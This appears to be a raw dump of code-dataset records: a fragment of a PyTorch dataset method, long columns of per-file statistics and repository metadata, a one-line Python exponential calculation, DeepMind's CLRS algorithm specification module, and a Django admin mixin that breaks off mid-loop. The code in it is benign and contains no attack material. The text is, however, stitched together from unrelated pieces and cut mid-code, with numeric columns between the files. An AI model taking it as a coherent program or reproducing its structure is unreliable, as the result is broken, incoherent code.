net_input = np.concatenate((start, goal))
net_input = torch.from_numpy(net_input)
start = torch.from_numpy(np.array([self.start_x[index], self.start_y[index]], dtype=np.float64))
goal = torch.from_numpy(np.array([self.goal_x[index], self.goal_y[index]], dtype=np.float64))
start_theta = np.array([self.start_theta1[index], self.start_theta2[index]], dtype=np.float64)
goal_theta = np.array([self.goal_theta1[index], self.goal_theta2[index]], dtype=np.float64)
cost = np.linalg.norm(start_theta - goal_theta)
return start, goal, net_input, cost
| 39.296296
| 130
| 0.634464
| 861
| 6,366
| 4.425087
| 0.098722
| 0.179528
| 0.16378
| 0.170866
| 0.868241
| 0.854068
| 0.787139
| 0.787139
| 0.779528
| 0.779528
| 0
| 0.023246
| 0.222903
| 6,366
| 162
| 131
| 39.296296
| 0.746917
| 0.137135
| 0
| 0.543689
| 0
| 0
| 0.058673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116505
| false
| 0.019417
| 0.058252
| 0.038835
| 0.291262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cca8a2e5a5ec633bf0a08c3a896f3532fef95e9
| 126
|
py
|
Python
|
Differential_Privacy/Customization/test.py
|
NigeloYang/tensorflow-practice
|
0778f3751512773504eb6c685dfb138aa8e43d40
|
[
"MIT"
] | null | null | null |
Differential_Privacy/Customization/test.py
|
NigeloYang/tensorflow-practice
|
0778f3751512773504eb6c685dfb138aa8e43d40
|
[
"MIT"
] | null | null | null |
Differential_Privacy/Customization/test.py
|
NigeloYang/tensorflow-practice
|
0778f3751512773504eb6c685dfb138aa8e43d40
|
[
"MIT"
] | null | null | null |
import math
print(math.exp((0.1 * 50) / 2) / (math.exp((0.1 * 50) / 2)+math.exp((0.1 * 20) / 2) + math.exp((0.1 * 30) / 2)))
| 31.5
| 112
| 0.5
| 27
| 126
| 2.333333
| 0.37037
| 0.444444
| 0.507937
| 0.571429
| 0.68254
| 0.52381
| 0.52381
| 0.52381
| 0.52381
| 0.52381
| 0
| 0.196078
| 0.190476
| 126
| 3
| 113
| 42
| 0.421569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 9
|
0cead2fd68e2aaa23c63cf0746768deb50de5850
| 23,689
|
py
|
Python
|
clrs/_src/specs.py
|
mohammedElfatihSalah/string-experiments
|
e43bb8db323d2d6da702697d052e8c9dac9782de
|
[
"Apache-2.0"
] | null | null | null |
clrs/_src/specs.py
|
mohammedElfatihSalah/string-experiments
|
e43bb8db323d2d6da702697d052e8c9dac9782de
|
[
"Apache-2.0"
] | 1
|
2021-10-05T16:08:02.000Z
|
2021-10-05T16:08:02.000Z
|
clrs/_src/specs.py
|
LaudateCorpus1/clrs
|
762165c29cf1dc83cc5b075f9ca77985e9223c9e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Algorithm specs.
The "spec" of each algorithm is a static set of `(stage, loc, type)`-tuples.
- `stage`: One of either an `input`, `output` or `hint`
- `location`: Each datum is associated with either the `node`, `edge` or `graph`
- `type`: Either a `scalar`, `categorical`, `mask`, `mask_one` or `pointer`
The dataflow for an algorithm is represented by `(stage, loc, type, data)`
"probes" that are valid under that algorithm's spec. It contains a single
snapshot for each `input` and `output` and a time-series of intermediate
algorithmic states (`hint`).
At minimum, each node contains a `pos` probe that serves as a unique index e.g.
for representing sequential data where appropriate
"""
import enum
import types
from typing import Dict, Tuple
class _OrderedEnum(enum.Enum):
def __lt__(self, other):
assert self.__class__ is other.__class__
return self.value < other.value # pylint: disable=comparison-with-callable
class Stage(_OrderedEnum):
INPUT = 'input'
OUTPUT = 'output'
HINT = 'hint'
class Location(_OrderedEnum):
NODE = 'node'
EDGE = 'edge'
GRAPH = 'graph'
class Type(_OrderedEnum):
SCALAR = 'scalar'
CATEGORICAL = 'categorical'
MASK = 'mask'
MASK_ONE = 'mask_one'
POINTER = 'pointer'
class OutputClass(_OrderedEnum):
POSITIVE = 1
NEGATIVE = 0
MASKED = -1
Spec = Dict[str, Tuple[Stage, Location, Type]]
CLRS_21_ALGS = [
'bellman_ford',
'bfs',
'binary_search',
'bubble_sort',
'dag_shortest_paths',
'dfs',
'dijkstra',
'find_maximum_subarray_kadane',
'floyd_warshall',
'heapsort',
'insertion_sort',
'kmp_matcher',
'matrix_chain_order',
'minimum',
'mst_prim',
'naive_string_matcher',
'optimal_bst',
'quickselect',
'quicksort',
'task_scheduling',
'topological_sort',
]
SPECS = types.MappingProxyType({
'insertion_sort': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'bubble_sort': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'heapsort': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'parent': (Stage.HINT, Location.NODE, Type.POINTER),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'largest': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'heap_size': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
},
'quicksort': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'pred': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'p': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'r': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'quickselect': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'median': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'p': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'r': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i_rank': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'target': (Stage.HINT, Location.GRAPH, Type.SCALAR)
},
'minimum': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'min': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'min_h': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'binary_search': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'target': (Stage.INPUT, Location.GRAPH, Type.SCALAR),
'return': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'mid': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'find_maximum_subarray': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'start': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'end': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'mid': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'left_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'left_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'left_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'right_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'right_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'right_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'cross_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'cross_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'cross_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'ret_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'ret_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'ret_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'left_x_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'right_x_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
},
'find_maximum_subarray_kadane': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.SCALAR),
'start': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'end': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'best_low': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'best_high': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'best_sum': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'sum': (Stage.HINT, Location.GRAPH, Type.SCALAR)
},
'matrix_chain_order': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'p': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.OUTPUT, Location.EDGE, Type.POINTER),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'm': (Stage.HINT, Location.EDGE, Type.SCALAR),
's_h': (Stage.HINT, Location.EDGE, Type.POINTER),
'msk': (Stage.HINT, Location.EDGE, Type.MASK)
},
'lcs_length': {
'string': (Stage.INPUT, Location.NODE, Type.MASK),
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.CATEGORICAL),
'b': (Stage.OUTPUT, Location.EDGE, Type.CATEGORICAL),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'b_h': (Stage.HINT, Location.EDGE, Type.CATEGORICAL),
'c': (Stage.HINT, Location.EDGE, Type.SCALAR)
},
'optimal_bst': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'p': (Stage.INPUT, Location.NODE, Type.SCALAR),
'q': (Stage.INPUT, Location.NODE, Type.SCALAR),
'root': (Stage.OUTPUT, Location.EDGE, Type.POINTER),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'root_h': (Stage.HINT, Location.EDGE, Type.POINTER),
'e': (Stage.HINT, Location.EDGE, Type.SCALAR),
'w': (Stage.HINT, Location.EDGE, Type.SCALAR),
'msk': (Stage.HINT, Location.EDGE, Type.MASK)
},
'activity_selector': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.INPUT, Location.NODE, Type.SCALAR),
'f': (Stage.INPUT, Location.NODE, Type.SCALAR),
'selected': (Stage.OUTPUT, Location.NODE, Type.MASK),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'selected_h': (Stage.HINT, Location.NODE, Type.MASK),
'm': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'k': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'task_scheduling': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'd': (Stage.INPUT, Location.NODE, Type.SCALAR),
'w': (Stage.INPUT, Location.NODE, Type.SCALAR),
'selected': (Stage.OUTPUT, Location.NODE, Type.MASK),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'selected_h': (Stage.HINT, Location.NODE, Type.MASK),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
't': (Stage.HINT, Location.GRAPH, Type.SCALAR)
},
'dfs': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'f': (Stage.HINT, Location.NODE, Type.SCALAR),
's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'time': (Stage.HINT, Location.GRAPH, Type.SCALAR)
},
'topological_sort': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'topo': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'topo_head': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'topo_h': (Stage.HINT, Location.NODE, Type.POINTER),
'topo_head_h': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'strongly_connected_components': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'scc_id': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'scc_id_h': (Stage.HINT, Location.NODE, Type.POINTER),
'A_t': (Stage.HINT, Location.EDGE, Type.MASK),
'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'f': (Stage.HINT, Location.NODE, Type.SCALAR),
's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'time': (Stage.HINT, Location.GRAPH, Type.SCALAR),
'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
},
'articulation_points': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'is_cut': (Stage.OUTPUT, Location.NODE, Type.MASK),
'is_cut_h': (Stage.HINT, Location.NODE, Type.MASK),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'f': (Stage.HINT, Location.NODE, Type.SCALAR),
'low': (Stage.HINT, Location.NODE, Type.SCALAR),
'child_cnt': (Stage.HINT, Location.NODE, Type.SCALAR),
's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'time': (Stage.HINT, Location.GRAPH, Type.SCALAR)
},
'bridges': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'is_bridge': (Stage.OUTPUT, Location.EDGE, Type.MASK),
'is_bridge_h': (Stage.HINT, Location.EDGE, Type.MASK),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'f': (Stage.HINT, Location.NODE, Type.SCALAR),
'low': (Stage.HINT, Location.NODE, Type.SCALAR),
's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'time': (Stage.HINT, Location.GRAPH, Type.SCALAR)
},
'bfs': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'reach_h': (Stage.HINT, Location.NODE, Type.MASK),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER)
},
'mst_kruskal': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'in_mst': (Stage.OUTPUT, Location.EDGE, Type.MASK),
'in_mst_h': (Stage.HINT, Location.EDGE, Type.MASK),
'pi': (Stage.HINT, Location.NODE, Type.POINTER),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'root_u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'root_v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'mask_u': (Stage.HINT, Location.NODE, Type.MASK),
'mask_v': (Stage.HINT, Location.NODE, Type.MASK),
'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
},
'mst_prim': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'key': (Stage.HINT, Location.NODE, Type.SCALAR),
'mark': (Stage.HINT, Location.NODE, Type.MASK),
'in_queue': (Stage.HINT, Location.NODE, Type.MASK),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'bellman_ford': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'msk': (Stage.HINT, Location.NODE, Type.MASK)
},
'dag_shortest_paths': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'mark': (Stage.HINT, Location.NODE, Type.MASK),
'topo_h': (Stage.HINT, Location.NODE, Type.POINTER),
'topo_head_h': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
},
'dijkstra': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'mark': (Stage.HINT, Location.NODE, Type.MASK),
'in_queue': (Stage.HINT, Location.NODE, Type.MASK),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'floyd_warshall': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
'Pi': (Stage.OUTPUT, Location.EDGE, Type.POINTER),
'Pi_h': (Stage.HINT, Location.EDGE, Type.POINTER),
'D': (Stage.HINT, Location.EDGE, Type.SCALAR),
'msk': (Stage.HINT, Location.EDGE, Type.MASK),
'k': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'bipartite_matching': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
't': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
'in_matching': (Stage.OUTPUT, Location.EDGE, Type.MASK),
'in_matching_h': (Stage.HINT, Location.EDGE, Type.MASK),
'A_h': (Stage.HINT, Location.EDGE, Type.SCALAR),
'adj_h': (Stage.HINT, Location.EDGE, Type.MASK),
'd': (Stage.HINT, Location.NODE, Type.SCALAR),
'msk': (Stage.HINT, Location.NODE, Type.MASK),
'pi': (Stage.HINT, Location.NODE, Type.POINTER),
'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
},
'naive_string_matcher': {
'string': (Stage.INPUT, Location.NODE, Type.MASK),
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.CATEGORICAL),
'match': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
},
'kmp_matcher': {
'string': (Stage.INPUT, Location.NODE, Type.MASK),
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'key': (Stage.INPUT, Location.NODE, Type.CATEGORICAL),
'match': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'pi': (Stage.HINT, Location.NODE, Type.POINTER),
'k': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'q': (Stage.HINT, Location.NODE, Type.MASK_ONE),
's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
},
'segments_intersect': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'x': (Stage.INPUT, Location.NODE, Type.SCALAR),
'y': (Stage.INPUT, Location.NODE, Type.SCALAR),
'intersect': (Stage.OUTPUT, Location.GRAPH, Type.MASK),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'k': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'dir': (Stage.HINT, Location.NODE, Type.SCALAR),
'on_seg': (Stage.HINT, Location.NODE, Type.MASK)
},
'graham_scan': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'x': (Stage.INPUT, Location.NODE, Type.SCALAR),
'y': (Stage.INPUT, Location.NODE, Type.SCALAR),
'in_hull': (Stage.OUTPUT, Location.NODE, Type.MASK),
'best': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'atans': (Stage.HINT, Location.NODE, Type.SCALAR),
'in_hull_h': (Stage.HINT, Location.NODE, Type.MASK),
'stack_prev': (Stage.HINT, Location.NODE, Type.POINTER),
'last_stack': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
},
'jarvis_march': {
'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
'x': (Stage.INPUT, Location.NODE, Type.SCALAR),
'y': (Stage.INPUT, Location.NODE, Type.SCALAR),
'in_hull': (Stage.OUTPUT, Location.NODE, Type.MASK),
'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
'in_hull_h': (Stage.HINT, Location.NODE, Type.MASK),
'best': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'last_point': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'endpoint': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
}
})
| 47.001984
| 80
| 0.612014
| 3,004
| 23,689
| 4.73036
| 0.090546
| 0.222942
| 0.297255
| 0.251232
| 0.83392
| 0.831809
| 0.789726
| 0.740253
| 0.68297
| 0.67931
| 0
| 0.000693
| 0.207776
| 23,689
| 503
| 81
| 47.095427
| 0.756487
| 0.059184
| 0
| 0.551422
| 0
| 0
| 0.091575
| 0.004761
| 0
| 0
| 0
| 0
| 0.002188
| 1
| 0.002188
| false
| 0
| 0.006565
| 0
| 0.052516
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b5ae2841183fda9d35ef99267b3db813c438d1a
| 1,479
|
py
|
Python
|
ara/classes/admin.py
|
sparcs-kaist/new-ara-api
|
63998da575cb148347708199fe1345c4e7ee3e1b
|
[
"MIT"
] | 19
|
2017-09-13T07:51:58.000Z
|
2022-03-28T11:04:03.000Z
|
ara/classes/admin.py
|
sparcs-kaist/new-ara-api
|
63998da575cb148347708199fe1345c4e7ee3e1b
|
[
"MIT"
] | 147
|
2017-09-14T13:45:30.000Z
|
2022-03-14T15:54:09.000Z
|
ara/classes/admin.py
|
sparcs-kaist/new-ara-api
|
63998da575cb148347708199fe1345c4e7ee3e1b
|
[
"MIT"
] | 5
|
2019-08-31T13:13:30.000Z
|
2021-03-26T15:46:38.000Z
|
from django.contrib import admin
class MetaDataModelAdmin(admin.ModelAdmin):
meta_data_fields = (
'created_at',
'updated_at',
'deleted_at',
)
def get_readonly_fields(self, request, obj=None) -> list:
readonly_fields = list(super().get_readonly_fields(request, obj))
for meta_data_field in self.meta_data_fields:
if meta_data_field not in readonly_fields:
readonly_fields.append(meta_data_field)
return readonly_fields
class MetaDataStackedInline(admin.StackedInline):
meta_data_fields = (
'created_at',
'updated_at',
'deleted_at',
)
def get_readonly_fields(self, request, obj=None) -> list:
readonly_fields = list(super().get_readonly_fields(request, obj))
for meta_data_field in self.meta_data_fields:
